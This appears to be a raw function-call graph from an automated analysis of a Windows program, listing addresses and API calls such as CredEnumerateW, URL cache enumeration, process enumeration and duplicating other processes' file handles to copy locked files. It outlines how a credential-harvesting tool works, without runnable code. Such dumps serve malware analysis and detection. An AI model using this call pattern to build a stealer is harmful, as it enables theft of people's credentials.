38309->38315 38784 409b98 GetFileAttributesW 38310->38784 38311 40b6ef 252 API calls 38311->38249 38317 4456e2 38312->38317 38318 445c23 38313->38318 38314 445d83 38314->38249 38315->38309 38678 413fa6 _wcsicmp _wcsicmp 38317->38678 38322 409d1f 6 API calls 38318->38322 38320 445e12 38323 445e6b 38320->38323 38327 40b2cc 27 API calls 38320->38327 38325 445c37 38322->38325 38786 445093 23 API calls 38323->38786 38324 4456eb 38330 4456fd memset memset memset memset 38324->38330 38331 4457ea 38324->38331 38332 445389 258 API calls 38325->38332 38326 445b17 38759 40aebe 38326->38759 38334 445e33 38327->38334 38679 409c70 wcscpy wcsrchr 38330->38679 38682 413d29 38331->38682 38338 445c47 38332->38338 38339 409d1f 6 API calls 38334->38339 38336 445e7e 38341 445f67 38336->38341 38344 40b2cc 27 API calls 38338->38344 38345 445e47 38339->38345 38340->38204 38578 403e2d memset memset memset memset memset 38340->38578 38346 40b2cc 27 API calls 38341->38346 38342 445ab2 memset 38347 40b2cc 27 API calls 38342->38347 38349 445c53 38344->38349 38785 409b98 GetFileAttributesW 38345->38785 38351 445f73 38346->38351 38352 445aa1 38347->38352 38348 409c70 2 API calls 38353 44577e 38348->38353 38354 409d1f 6 API calls 38349->38354 38356 409d1f 6 API calls 38351->38356 38352->38326 38352->38342 38357 409d1f 6 API calls 38352->38357 38651 40add4 38352->38651 38656 445389 38352->38656 38665 40ae51 38352->38665 38358 409c70 2 API calls 38353->38358 38359 445c67 38354->38359 38355 445e56 38355->38323 38363 445e83 memset 38355->38363 38360 445f87 38356->38360 38357->38352 38361 44578d 38358->38361 38362 445389 258 API calls 38359->38362 38789 409b98 GetFileAttributesW 38360->38789 38361->38331 38368 40b2cc 27 API calls 38361->38368 38362->38222 38367 40b2cc 27 API calls 38363->38367 38366->38249 38366->38311 38369 445eab 38367->38369 38370 4457a8 38368->38370 38371 409d1f 6 API calls 38369->38371 38372 409d1f 6 API calls 38370->38372 38374 445ebf 38371->38374 38373 4457b8 38372->38373 38681 409b98 GetFileAttributesW 38373->38681 38376 40ae18 9 API calls 38374->38376 38380 445ef5 38376->38380 38377 4457c7 38377->38331 38379 4087b3 338 API calls 38377->38379 38378 40ae51 9 API calls 38378->38380 38379->38331 38380->38378 38381 445f5c 38380->38381 38383 40add4 2 API calls 38380->38383 38384 40b2cc 27 API calls 38380->38384 38385 409d1f 6 API calls 38380->38385 38387 445f3a 38380->38387 38787 409b98 GetFileAttributesW 38380->38787 38382 40aebe FindClose 38381->38382 38382->38341 38383->38380 38384->38380 38385->38380 38788 445093 23 API calls 38387->38788 38389->38186 38390->38188 38391->38186 38392->38181 38394 40c775 38393->38394 38790 40b1ab free free 38394->38790 38396 40c788 38791 40b1ab free free 38396->38791 38398 40c790 38792 40b1ab free free 38398->38792 38400 40c798 38401 40aa04 free 38400->38401 38402 40c7a0 38401->38402 38793 40c274 memset 38402->38793 38407 40a8ab 9 API calls 38408 40c7c3 38407->38408 38409 40a8ab 9 API calls 38408->38409 38410 40c7d0 38409->38410 38822 40c3c3 38410->38822 38414 40c877 38423 40bdb0 38414->38423 38415 40c86c 38864 4053fe 39 API calls 38415->38864 38421 40c7e5 38421->38414 38421->38415 38422 40c634 49 API calls 38421->38422 38847 40a706 38421->38847 38422->38421 39032 404363 38423->39032 38426 40bf5d 39052 40440c 38426->39052 38428 40bdee 38428->38426 38431 40b2cc 27 API calls 38428->38431 38429 40bddf CredEnumerateW 38429->38428 38432 40be02 wcslen 38431->38432 38432->38426 38442 40be1e 38432->38442 38433 40be26 wcsncmp 38433->38442 38436 40be7d memset 38437 40bea7 memcpy 38436->38437 38436->38442 38438 40bf11 wcschr 38437->38438 38437->38442 38438->38442 38439 40b2cc 27 API calls 38440 40bef6 _wcsnicmp 38439->38440 38440->38438 38440->38442 38441 40bf43 LocalFree 38441->38442 38442->38426 38442->38433 38442->38436 38442->38437 38442->38438 38442->38439 38442->38441 39055 40bd5d 28 API calls 38442->39055 39056 404423 38442->39056 38443 4135f7 39069 4135e0 38443->39069 38446 40b2cc 27 API calls 38447 41360d 38446->38447 38448 40a804 8 API calls 38447->38448 38449 413613 38448->38449 38450 41361b 38449->38450 38451 41363e 38449->38451 38452 40b273 27 API calls 38450->38452 38453 4135e0 FreeLibrary 38451->38453 38454 413625 GetProcAddress 38452->38454 38455 413643 38453->38455 38454->38451 38456 413648 38454->38456 38455->38214 38457 413658 38456->38457 38458 4135e0 FreeLibrary 38456->38458 38457->38214 38459 413666 38458->38459 38459->38214 39072 4449b9 38460->39072 38463 4449b9 42 API calls 38465 444b4b 38463->38465 38464 444c15 38466 4449b9 42 API calls 38464->38466 38465->38464 39093 444972 GetVersionExW 38465->39093 38468 444c1f 38466->38468 38468->38196 38469 444b99 memcmp 38474 444b8c 38469->38474 38470 444c0b 39097 444a85 42 API calls 38470->39097 38474->38469 38474->38470 39094 444aa5 42 API calls 38474->39094 39095 40a7a0 GetVersionExW 38474->39095 39096 444a85 42 API calls 38474->39096 38477 40399d 38476->38477 39098 403a16 38477->39098 38480 403a12 wcsrchr 38480->38212 38483 4039a3 38484 4039f4 38483->38484 38486 403a09 38483->38486 39109 40a02c CreateFileW 38483->39109 38485 4099c6 2 API calls 38484->38485 38484->38486 38485->38486 39112 40b1ab free free 38486->39112 38488 414c2e 16 API calls 38487->38488 38489 404048 38488->38489 38490 414c2e 16 API calls 38489->38490 38491 404056 38490->38491 38492 409d1f 6 API calls 38491->38492 38493 404073 38492->38493 38494 409d1f 6 API calls 38493->38494 38495 40408e 38494->38495 38496 409d1f 6 API calls 38495->38496 38497 4040a6 38496->38497 38498 403af5 20 API calls 38497->38498 38499 4040ba 38498->38499 38500 403af5 20 API calls 38499->38500 38501 4040cb 38500->38501 39139 40414f memset 38501->39139 38503 404140 39153 40b1ab free free 38503->39153 38504 4040ec memset 38508 4040e0 38504->38508 38506 404148 38506->38266 38507 4099c6 2 API calls 38507->38508 38508->38503 38508->38504 38508->38507 38509 40a8ab 9 API calls 38508->38509 38509->38508 39166 40a6e6 WideCharToMultiByte 38510->39166 38512 4087ed 39167 4095d9 memset 38512->39167 38515 408809 memset memset memset memset memset 38516 40b2cc 27 API calls 38515->38516 38517 4088a1 38516->38517 38518 409d1f 6 API calls 38517->38518 38519 4088b1 38518->38519 38520 40b2cc 27 API calls 38519->38520 38521 4088c0 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 4088d0 38522->38523 38524 40b2cc 27 API calls 38523->38524 38525 4088df 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 4088ef 38526->38527 38528 40b2cc 27 API calls 38527->38528 38529 4088fe 38528->38529 38530 409d1f 6 API calls 38529->38530 38531 40890e 38530->38531 38532 40b2cc 27 API calls 38531->38532 38533 40891d 38532->38533 38534 409d1f 6 API calls 38533->38534 38535 40892d 38534->38535 39186 409b98 GetFileAttributesW 38535->39186 38537 40893e 38538 408943 38537->38538 38539 408958 38537->38539 39187 407fdf 75 API calls 38538->39187 39188 409b98 GetFileAttributesW 38539->39188 38542 408964 38543 408969 38542->38543 38544 40897b 38542->38544 39189 4082c7 199 API calls 38543->39189 39190 409b98 GetFileAttributesW 38544->39190 38547 408953 38547->38266 38548 408987 38549 4089a1 38548->38549 38550 40898c 38548->38550 38562 40b633 free 38561->38562 38563 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38562->38563 38564 413f00 Process32NextW 38563->38564 38565 413da5 OpenProcess 38564->38565 38566 413f17 CloseHandle 38564->38566 38567 413eb0 38565->38567 38568 413df3 memset 38565->38568 38566->38306 38567->38564 38570 413ebf free 38567->38570 38571 4099f4 3 API calls 38567->38571 39478 413f27 38568->39478 38570->38567 38571->38567 38573 413e37 GetModuleHandleW 38574 413e1f 38573->38574 38575 413e46 GetProcAddress 38573->38575 38574->38573 39483 413959 38574->39483 39499 413ca4 38574->39499 38575->38574 38577 413ea2 CloseHandle 38577->38567 38579 414c2e 16 API calls 38578->38579 38580 403eb7 38579->38580 38581 414c2e 16 API calls 38580->38581 38582 403ec5 38581->38582 38583 409d1f 6 API calls 38582->38583 38584 403ee2 38583->38584 38585 409d1f 6 API calls 38584->38585 38586 403efd 38585->38586 38587 409d1f 6 API calls 38586->38587 38588 403f15 38587->38588 38589 403af5 20 API calls 38588->38589 38590 403f29 38589->38590 38591 403af5 20 API calls 38590->38591 38592 403f3a 38591->38592 38593 40414f 33 API calls 38592->38593 38599 403f4f 38593->38599 38594 403faf 39513 40b1ab free free 38594->39513 38596 403f5b memset 38596->38599 38597 403fb7 38597->38252 38598 4099c6 2 API calls 38598->38599 38599->38594 38599->38596 38599->38598 38600 40a8ab 9 API calls 38599->38600 38600->38599 38602 414c2e 16 API calls 38601->38602 38603 403d26 38602->38603 38604 414c2e 16 API calls 38603->38604 38605 403d34 38604->38605 38606 409d1f 6 API calls 38605->38606 38607 403d51 38606->38607 38608 409d1f 6 API calls 38607->38608 38609 403d6c 38608->38609 38610 409d1f 6 API calls 38609->38610 38611 403d84 38610->38611 38612 403af5 20 API calls 38611->38612 38613 403d98 38612->38613 38614 403af5 20 API calls 38613->38614 38615 403da9 38614->38615 38616 40414f 33 API calls 38615->38616 38622 403dbe 38616->38622 38617 403e1e 39514 40b1ab free free 38617->39514 38618 403dca memset 38618->38622 38620 403e26 38620->38255 38621 4099c6 2 API calls 38621->38622 38622->38617 38622->38618 38622->38621 38623 40a8ab 9 API calls 38622->38623 38623->38622 38625 414b81 9 API calls 38624->38625 38626 414c40 38625->38626 38627 414c73 memset 38626->38627 39515 409cea 38626->39515 38631 414c94 38627->38631 38630 414c64 38630->38247 39518 414592 RegOpenKeyExW 38631->39518 38633 414cc1 38634 414cf4 wcscpy 38633->38634 39519 414bb0 wcscpy 38633->39519 38634->38630 38636 414cd2 39520 4145ac RegQueryValueExW 38636->39520 38638 414ce9 RegCloseKey 38638->38634 38640 409d43 wcscpy 38639->38640 38642 409d62 38639->38642 38641 409719 2 API calls 38640->38641 38643 409d51 wcscat 38641->38643 38642->38286 38643->38642 38645 40aebe FindClose 38644->38645 38646 40ae21 38645->38646 38647 4099c6 2 API calls 38646->38647 38648 40ae35 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 40ae49 38649->38650 38650->38352 38652 40ade0 38651->38652 38653 40ae0f 38651->38653 38652->38653 38654 40ade7 wcscmp 38652->38654 38653->38352 38654->38653 38655 40adfe wcscmp 38654->38655 38655->38653 38657 40ae18 9 API calls 38656->38657 38663 4453c4 38657->38663 38658 40ae51 9 API calls 38658->38663 38659 4453f3 38660 40aebe FindClose 38659->38660 38662 4453fe 38660->38662 38661 40add4 2 API calls 38661->38663 38662->38352 38663->38658 38663->38659 38663->38661 38664 445403 253 API calls 38663->38664 38664->38663 38666 40ae7b FindNextFileW 38665->38666 38667 40ae5c FindFirstFileW 38665->38667 38668 40ae8f 38666->38668 38669 40ae94 38666->38669 38667->38669 38670 40aebe FindClose 38668->38670 38671 40aeb6 38669->38671 38672 409d1f 6 API calls 38669->38672 38670->38669 38671->38352 38672->38671 38673->38233 38674->38220 38675->38309 38676->38293 38677->38293 38678->38324 38680 409c89 38679->38680 38680->38348 38681->38377 38683 413d39 38682->38683 38684 413d2f FreeLibrary 38682->38684 38685 40b633 free 38683->38685 38684->38683 38686 413d42 38685->38686 38687 40b633 free 38686->38687 38688 413d4a 38687->38688 38688->38340 38689->38204 38690->38205 38691->38278 38693 44db70 38692->38693 38694 40b6fc memset 38693->38694 38695 409c70 2 API calls 38694->38695 38696 40b732 wcsrchr 38695->38696 38697 40b743 38696->38697 38698 40b746 memset 38696->38698 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 40b76f 38699->38700 38701 409d1f 6 API calls 38700->38701 38702 40b783 38701->38702 39521 409b98 GetFileAttributesW 38702->39521 38704 40b792 38705 409c70 2 API calls 38704->38705 38719 40b7c2 38704->38719 38707 40b7a5 38705->38707 38709 40b2cc 27 API calls 38707->38709 38713 40b7b2 38709->38713 38710 40b837 CloseHandle 38712 40b83e memset 38710->38712 38711 40b817 39556 409a45 GetTempPathW 38711->39556 39555 40a6e6 WideCharToMultiByte 38712->39555 38717 409d1f 6 API calls 38713->38717 38715 40b827 CopyFileW 38715->38712 38717->38719 38718 40b866 38720 444432 121 API calls 38718->38720 39522 40bb98 38719->39522 38721 40b879 38720->38721 38722 40bad5 38721->38722 38723 40b273 27 API calls 38721->38723 38724 40baeb 38722->38724 38725 40bade DeleteFileW 38722->38725 38726 40b89a 38723->38726 38727 40b04b ??3@YAXPAX 38724->38727 38725->38724 38728 438552 134 API calls 38726->38728 38729 40baf3 38727->38729 38730 40b8a4 38728->38730 38729->38207 38731 40bacd 38730->38731 38733 4251c4 137 API calls 38730->38733 38732 443d90 111 API calls 38731->38732 38732->38722 38756 40b8b8 38733->38756 38734 40bac6 39568 424f26 123 API calls 38734->39568 38735 40b8bd memset 39559 425413 17 API calls 38735->39559 38738 425413 17 API calls 38738->38756 38741 40a71b MultiByteToWideChar 38741->38756 38742 40a734 MultiByteToWideChar 38742->38756 38745 40b9b5 memcmp 38745->38756 38746 4099c6 2 API calls 38746->38756 38747 404423 37 API calls 38747->38756 38750 40bb3e memset memcpy 39569 40a734 MultiByteToWideChar 38750->39569 38751 4251c4 137 API calls 38751->38756 38753 40bb88 LocalFree 38753->38756 38756->38734 38756->38735 38756->38738 38756->38741 38756->38742 38756->38745 38756->38746 38756->38747 38756->38750 38756->38751 38757 40ba5f memcmp 38756->38757 39560 4253ef 16 API calls 38756->39560 39561 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38756->39561 39562 4253af 17 API calls 38756->39562 39563 4253cf 17 API calls 38756->39563 39564 447280 memset 38756->39564 39565 447960 memset memcpy memcpy memcpy 38756->39565 39566 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38756->39566 39567 447920 memcpy memcpy memcpy 38756->39567 38757->38756 38758->38282 38760 40aed1 38759->38760 38761 40aec7 FindClose 38759->38761 38760->38217 38761->38760 38763 4099d7 38762->38763 38764 4099da memcpy 38762->38764 38763->38764 38764->38265 38766 40b2cc 27 API calls 38765->38766 38767 44543f 38766->38767 38768 409d1f 6 API calls 38767->38768 38769 44544f 38768->38769 39661 409b98 GetFileAttributesW 38769->39661 38771 445476 38774 40b2cc 27 API calls 38771->38774 38772 44545e 38772->38771 38773 40b6ef 252 API calls 38772->38773 38773->38771 38775 445482 38774->38775 38776 409d1f 6 API calls 38775->38776 38777 445492 38776->38777 39662 409b98 GetFileAttributesW 38777->39662 38779 4454a1 38780 4454b9 38779->38780 38781 40b6ef 252 API calls 38779->38781 38780->38291 38781->38780 38782->38290 38783->38314 38784->38320 38785->38355 38786->38336 38787->38380 38788->38380 38789->38366 38790->38396 38791->38398 38792->38400 38794 414c2e 16 API calls 38793->38794 38795 40c2ae 38794->38795 38865 40c1d3 38795->38865 38800 40c3be 38817 40a8ab 38800->38817 38801 40afcf 2 API calls 38802 40c2fd FindFirstUrlCacheEntryW 38801->38802 38803 40c3b6 38802->38803 38804 40c31e wcschr 38802->38804 38805 40b04b ??3@YAXPAX 38803->38805 38806 40c331 38804->38806 38807 40c35e FindNextUrlCacheEntryW 38804->38807 38805->38800 38808 40a8ab 9 API calls 38806->38808 38807->38804 38809 40c373 GetLastError 38807->38809 38812 40c33e wcschr 38808->38812 38810 40c3ad FindCloseUrlCache 38809->38810 38811 40c37e 38809->38811 38810->38803 38813 40afcf 2 API calls 38811->38813 38812->38807 38814 40c34f 38812->38814 38815 40c391 FindNextUrlCacheEntryW 38813->38815 38816 40a8ab 9 API calls 38814->38816 38815->38804 38815->38810 38816->38807 38959 40a97a 38817->38959 38820 40a8cc 38820->38407 38821 40a8d0 7 API calls 38821->38820 38964 40b1ab free free 38822->38964 38824 40c3dd 38825 40b2cc 27 API calls 38824->38825 38826 40c3e7 38825->38826 38965 414592 RegOpenKeyExW 38826->38965 38828 40c3f4 38829 40c50e 38828->38829 38830 40c3ff 38828->38830 38844 405337 38829->38844 38831 40a9ce 4 API calls 38830->38831 38832 40c418 memset 38831->38832 38966 40aa1d 38832->38966 38835 40c471 38837 40c47a _wcsupr 38835->38837 38836 40c505 RegCloseKey 38836->38829 38838 40a8d0 7 API calls 38837->38838 38839 40c498 38838->38839 38840 40a8d0 7 API calls 38839->38840 38841 40c4ac memset 38840->38841 38842 40aa1d 38841->38842 38843 40c4e4 RegEnumValueW 38842->38843 38843->38836 38843->38837 38968 405220 38844->38968 38848 4099c6 2 API calls 38847->38848 38849 40a714 _wcslwr 38848->38849 38850 40c634 38849->38850 39025 405361 38850->39025 38853 40c65c wcslen 39028 4053b6 39 API calls 38853->39028 38854 40c71d wcslen 38854->38421 38856 40c677 38857 40c713 38856->38857 39029 40538b 39 API calls 38856->39029 39031 4053df 39 API calls 38857->39031 38860 40c6a5 38860->38857 38861 40c6a9 memset 38860->38861 38862 40c6d3 38861->38862 39030 40c589 43 API calls 38862->39030 38864->38414 38866 40ae18 9 API calls 38865->38866 38872 40c210 38866->38872 38867 40ae51 9 API calls 38867->38872 38868 40c264 38869 40aebe FindClose 38868->38869 38871 40c26f 38869->38871 38870 40add4 2 API calls 38870->38872 38877 40e5ed memset memset 38871->38877 38872->38867 38872->38868 38872->38870 38873 40c231 _wcsicmp 38872->38873 38874 40c1d3 35 API calls 38872->38874 38873->38872 38875 40c248 38873->38875 38874->38872 38890 40c084 22 API calls 38875->38890 38878 414c2e 16 API calls 38877->38878 38879 40e63f 38878->38879 38880 409d1f 6 API calls 38879->38880 38881 40e658 38880->38881 38891 409b98 GetFileAttributesW 38881->38891 38883 40e667 38884 40e680 38883->38884 38885 409d1f 6 API calls 38883->38885 38892 409b98 GetFileAttributesW 38884->38892 38885->38884 38887 40e68f 38889 40c2d8 38887->38889 38893 40e4b2 38887->38893 38889->38800 38889->38801 38890->38872 38891->38883 38892->38887 38914 40e01e 38893->38914 38895 40e593 38896 40e5b0 38895->38896 38897 40e59c DeleteFileW 38895->38897 38899 40b04b ??3@YAXPAX 38896->38899 38897->38896 38898 40e521 38898->38895 38937 40e175 38898->38937 38900 40e5bb 38899->38900 38902 40e5c4 CloseHandle 38900->38902 38903 40e5cc 38900->38903 38902->38903 38905 40b633 free 38903->38905 38904 40e573 38907 40e584 38904->38907 38908 40e57c CloseHandle 38904->38908 38906 40e5db 38905->38906 38910 40b633 free 38906->38910 38958 40b1ab free free 38907->38958 38908->38907 38909 40e540 38909->38904 38957 40e2ab 30 API calls 38909->38957 38912 40e5e3 38910->38912 38912->38889 38915 406214 22 API calls 38914->38915 38916 40e03c 38915->38916 38917 40e16b 38916->38917 38918 40dd85 74 API calls 38916->38918 38917->38898 38919 40e06b 38918->38919 38919->38917 38920 40afcf ??2@YAPAXI ??3@YAXPAX 38919->38920 38921 40e08d OpenProcess 38920->38921 38922 40e0a4 GetCurrentProcess DuplicateHandle 38921->38922 38926 40e152 38921->38926 38923 40e0d0 GetFileSize 38922->38923 38924 40e14a CloseHandle 38922->38924 38927 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38923->38927 38924->38926 38925 40e160 38929 40b04b ??3@YAXPAX 38925->38929 38926->38925 38928 406214 22 API calls 38926->38928 38930 40e0ea 38927->38930 38928->38925 38929->38917 38931 4096dc CreateFileW 38930->38931 38932 40e0f1 CreateFileMappingW 38931->38932 38933 40e140 CloseHandle CloseHandle 38932->38933 38934 40e10b MapViewOfFile 38932->38934 38933->38924 38935 40e13b CloseHandle 38934->38935 38936 40e11f WriteFile UnmapViewOfFile 38934->38936 38935->38933 38936->38935 38938 40e18c 38937->38938 38939 406b90 11 API calls 38938->38939 38940 40e19f 38939->38940 38941 40e1a7 memset 38940->38941 38942 40e299 38940->38942 38947 40e1e8 38941->38947 38943 4069a3 ??3@YAXPAX free 38942->38943 38944 40e2a4 38943->38944 38944->38909 38945 406e8f 13 API calls 38945->38947 38946 406b53 SetFilePointerEx ReadFile 38946->38947 38947->38945 38947->38946 38948 40e283 38947->38948 38949 40dd50 _wcsicmp 38947->38949 38953 40742e 8 API calls 38947->38953 38954 40aae3 wcslen wcslen _memicmp 38947->38954 38955 40e244 _snwprintf 38947->38955 38950 40e291 38948->38950 38951 40e288 free 38948->38951 38949->38947 38952 40aa04 free 38950->38952 38951->38950 38952->38942 38953->38947 38954->38947 38956 40a8d0 7 API calls 38955->38956 38956->38947 38957->38909 38958->38895 38961 40a980 38959->38961 38960 40a8bb 38960->38820 38960->38821 38961->38960 38962 40a995 _wcsicmp 38961->38962 38963 40a99c wcscmp 38961->38963 38962->38961 38963->38961 38964->38824 38965->38828 38967 40aa23 RegEnumValueW 38966->38967 38967->38835 38967->38836 38969 405335 38968->38969 38970 40522a 38968->38970 38969->38421 38971 40b2cc 27 API calls 38970->38971 38972 405234 38971->38972 38973 40a804 8 API calls 38972->38973 38974 40523a 38973->38974 39013 40b273 38974->39013 38976 405248 _mbscpy _mbscat GetProcAddress 38977 40b273 27 API calls 38976->38977 38978 405279 38977->38978 39016 405211 GetProcAddress 38978->39016 38980 405282 38981 40b273 27 API calls 38980->38981 38982 40528f 38981->38982 39017 405211 GetProcAddress 38982->39017 38984 405298 38985 40b273 27 API calls 38984->38985 38986 4052a5 38985->38986 39018 405211 GetProcAddress 38986->39018 38988 4052ae 38989 40b273 27 API calls 38988->38989 38990 4052bb 38989->38990 39019 405211 GetProcAddress 38990->39019 38992 4052c4 38993 40b273 27 API calls 38992->38993 38994 4052d1 38993->38994 39020 405211 GetProcAddress 38994->39020 38996 4052da 38997 40b273 27 API calls 38996->38997 38998 4052e7 38997->38998 39021 405211 GetProcAddress 38998->39021 39000 4052f0 39001 40b273 27 API calls 39000->39001 39002 4052fd 39001->39002 39022 405211 GetProcAddress 39002->39022 39004 405306 39005 40b273 27 API calls 39004->39005 39006 405313 39005->39006 39023 405211 GetProcAddress 39006->39023 39008 40531c 39009 40b273 27 API calls 39008->39009 39010 405329 39009->39010 39024 405211 GetProcAddress 39010->39024 39012 405332 39012->38969 39014 40b58d 27 API calls 39013->39014 39015 40b18c 39014->39015 39015->38976 39016->38980 39017->38984 39018->38988 39019->38992 39020->38996 39021->39000 39022->39004 39023->39008 39024->39012 39026 405220 39 API calls 39025->39026 39027 405369 39026->39027 39027->38853 39027->38854 39028->38856 39029->38860 39030->38857 39031->38854 39033 40440c FreeLibrary 39032->39033 39034 40436d 39033->39034 39035 40a804 8 API calls 39034->39035 39036 404377 39035->39036 39037 404383 39036->39037 39038 404405 39036->39038 39039 40b273 27 API calls 39037->39039 39038->38426 39038->38428 39038->38429 39040 40438d GetProcAddress 39039->39040 39041 40b273 27 API calls 39040->39041 39042 4043a7 GetProcAddress 39041->39042 39043 40b273 27 API calls 39042->39043 39044 4043ba GetProcAddress 39043->39044 39045 40b273 27 API calls 39044->39045 39046 4043ce GetProcAddress 39045->39046 39047 40b273 27 API calls 39046->39047 39048 4043e2 GetProcAddress 39047->39048 39049 4043f1 39048->39049 39050 4043f7 39049->39050 39051 40440c FreeLibrary 39049->39051 39050->39038 39051->39038 39053 404413 FreeLibrary 39052->39053 39054 40441e 39052->39054 39053->39054 39054->38443 39055->38442 39057 40442e 39056->39057 39059 40447e 39056->39059 39058 40b2cc 27 API calls 39057->39058 39060 404438 39058->39060 39059->38442 39061 40a804 8 API calls 39060->39061 39062 40443e 39061->39062 39063 404445 39062->39063 39064 404467 39062->39064 39065 40b273 27 API calls 39063->39065 39064->39059 39067 404475 FreeLibrary 39064->39067 39066 40444f GetProcAddress 39065->39066 39066->39064 39068 404460 39066->39068 39067->39059 39068->39064 39070 4135f6 39069->39070 39071 4135eb FreeLibrary 39069->39071 39070->38446 39071->39070 39073 4449c4 39072->39073 39074 444a52 39072->39074 39075 40b2cc 27 API calls 39073->39075 39074->38463 39074->38468 39076 4449cb 39075->39076 39077 40a804 8 API calls 39076->39077 39078 4449d1 39077->39078 39079 40b273 27 API calls 39078->39079 39080 4449dc GetProcAddress 39079->39080 39081 40b273 27 API calls 39080->39081 39082 4449f3 GetProcAddress 39081->39082 39083 40b273 27 API calls 39082->39083 39084 444a04 GetProcAddress 39083->39084 39085 40b273 27 API calls 39084->39085 39086 444a15 GetProcAddress 39085->39086 39087 40b273 27 API calls 39086->39087 39088 444a26 GetProcAddress 39087->39088 39089 40b273 27 API calls 39088->39089 39090 444a37 GetProcAddress 39089->39090 39091 40b273 27 API calls 39090->39091 39092 444a48 GetProcAddress 39091->39092 39092->39074 39093->38474 39094->38474 39095->38474 39096->38474 39097->38464 39099 403a29 39098->39099 39113 403bed memset memset 39099->39113 39101 403ae7 39126 40b1ab free free 39101->39126 39102 403a3f memset 39107 403a2f 39102->39107 39104 403aef 39104->38483 39105 409d1f 6 API calls 39105->39107 39106 409b98 GetFileAttributesW 39106->39107 39107->39101 39107->39102 39107->39105 39107->39106 39108 40a8d0 7 API calls 39107->39108 39108->39107 39110 40a051 GetFileTime CloseHandle 39109->39110 39111 4039ca CompareFileTime 39109->39111 39110->39111 39111->38483 39112->38480 39114 414c2e 16 API calls 39113->39114 39115 403c38 39114->39115 39116 409719 2 API calls 39115->39116 39117 403c3f wcscat 39116->39117 39118 414c2e 16 API calls 39117->39118 39119 403c61 39118->39119 39120 409719 2 API calls 39119->39120 39121 403c68 wcscat 39120->39121 39127 403af5 39121->39127 39124 403af5 20 API calls 39125 403c95 39124->39125 39125->39107 39126->39104 39128 403b02 39127->39128 39129 40ae18 9 API calls 39128->39129 39131 403b37 39129->39131 39130 40ae51 9 API calls 39130->39131 39131->39130 39132 403bdb 39131->39132 39133 40add4 wcscmp wcscmp 39131->39133 39136 40ae18 9 API calls 39131->39136 39137 40aebe FindClose 39131->39137 39138 40a8d0 7 API calls 39131->39138 39134 40aebe FindClose 39132->39134 39133->39131 39135 403be6 39134->39135 39135->39124 39136->39131 39137->39131 39138->39131 39140 409d1f 6 API calls 39139->39140 39141 404190 39140->39141 39154 409b98 GetFileAttributesW 39141->39154 39143 40419c 39144 4041a7 6 API calls 39143->39144 39145 40435c 39143->39145 39147 40424f 39144->39147 39145->38508 39147->39145 39148 40425e memset 39147->39148 39150 409d1f 6 API calls 39147->39150 39151 40a8ab 9 API calls 39147->39151 39155 414842 39147->39155 39148->39147 39149 404296 wcscpy 39148->39149 39149->39147 39150->39147 39152 4042b6 memset memset _snwprintf wcscpy 39151->39152 39152->39147 39153->38506 39154->39143 39158 41443e 39155->39158 39157 414866 39157->39147 39159 41444b 39158->39159 39160 414451 39159->39160 39161 4144a3 GetPrivateProfileStringW 39159->39161 39162 414491 39160->39162 39163 414455 wcschr 39160->39163 39161->39157 39165 414495 WritePrivateProfileStringW 39162->39165 39163->39162 39164 414463 _snwprintf 39163->39164 39164->39165 39165->39157 39166->38512 39168 40b2cc 27 API calls 39167->39168 39169 409615 39168->39169 39170 409d1f 6 API calls 39169->39170 39171 409625 39170->39171 39196 409b98 GetFileAttributesW 39171->39196 39173 409634 39174 409648 39173->39174 39197 4091b8 memset 39173->39197 39176 40b2cc 27 API calls 39174->39176 39178 408801 39174->39178 39177 40965d 39176->39177 39179 409d1f 6 API calls 39177->39179 39178->38515 39178->38547 39180 40966d 39179->39180 39249 409b98 GetFileAttributesW 39180->39249 39182 40967c 39182->39178 39183 409681 39182->39183 39250 409529 72 API calls 39183->39250 39185 409690 39185->39178 39186->38537 39187->38547 39188->38542 39189->38547 39190->38548 39196->39173 39251 40a6e6 WideCharToMultiByte 39197->39251 39199 409202 39252 444432 39199->39252 39202 40b273 27 API calls 39203 409236 39202->39203 39298 438552 39203->39298 39206 409383 39208 40b273 27 API calls 39206->39208 39210 409399 39208->39210 39209 409254 39211 40937b 39209->39211 39319 4253cf 17 API calls 39209->39319 39212 438552 134 API calls 39210->39212 39323 424f26 123 API calls 39211->39323 39230 4093a3 39212->39230 39215 409267 39320 4253cf 17 API calls 39215->39320 39216 4094ff 39327 443d90 39216->39327 39219 4251c4 137 API calls 39219->39230 39220 409273 39221 409507 39229 40951d 39221->39229 39347 408f2f 77 API calls 39221->39347 39223 4093df 39326 424f26 123 API calls 39223->39326 39227 4253cf 17 API calls 39227->39230 39229->39174 39230->39216 39230->39219 39230->39223 39230->39227 39232 4093e4 39230->39232 39324 4253af 17 API calls 39232->39324 39239 4093ed 39325 4253af 17 API calls 39239->39325 39242 4093f9 39242->39223 39243 409409 memcmp 39242->39243 39243->39223 39244 409421 memcmp 39243->39244 39245 4094a4 memcmp 39244->39245 39246 409435 39244->39246 39245->39223 39246->39223 39249->39182 39250->39185 39251->39199 39348 4438b5 39252->39348 39254 44444c 39255 409215 39254->39255 39362 415a6d 39254->39362 39255->39202 39255->39229 39257 4442e6 11 API calls 39258 44469e 39257->39258 39258->39255 39262 443d90 111 API calls 39258->39262 39259 444486 39260 4444b9 memcpy 39259->39260 39297 4444a4 39259->39297 39366 415258 39260->39366 39262->39255 39263 444524 39264 444541 39263->39264 39265 44452a 39263->39265 39369 444316 39264->39369 39266 416935 16 API calls 39265->39266 39266->39297 39269 444316 18 API calls 39270 444563 39269->39270 39271 444316 18 API calls 39270->39271 39272 44456f 39271->39272 39273 444316 18 API calls 39272->39273 39274 44457f 39273->39274 39274->39297 39383 432d4e 39274->39383 39277 444316 18 API calls 39297->39257 39436 438460 39298->39436 39300 409240 39300->39206 39301 4251c4 39300->39301 39448 424f07 39301->39448 39303 4251e4 39304 4251f7 39303->39304 39305 4251e8 39303->39305 39456 4250f8 39304->39456 39455 4446ea 11 API calls 39305->39455 39307 4251f2 39307->39209 39309 425209 39312 425249 39309->39312 39315 4250f8 127 API calls 39309->39315 39316 425287 39309->39316 39464 4384e9 135 API calls 39309->39464 39465 424f74 124 API calls 39309->39465 39312->39316 39466 424ff0 13 API calls 39312->39466 39315->39309 39468 415c7d 39316->39468 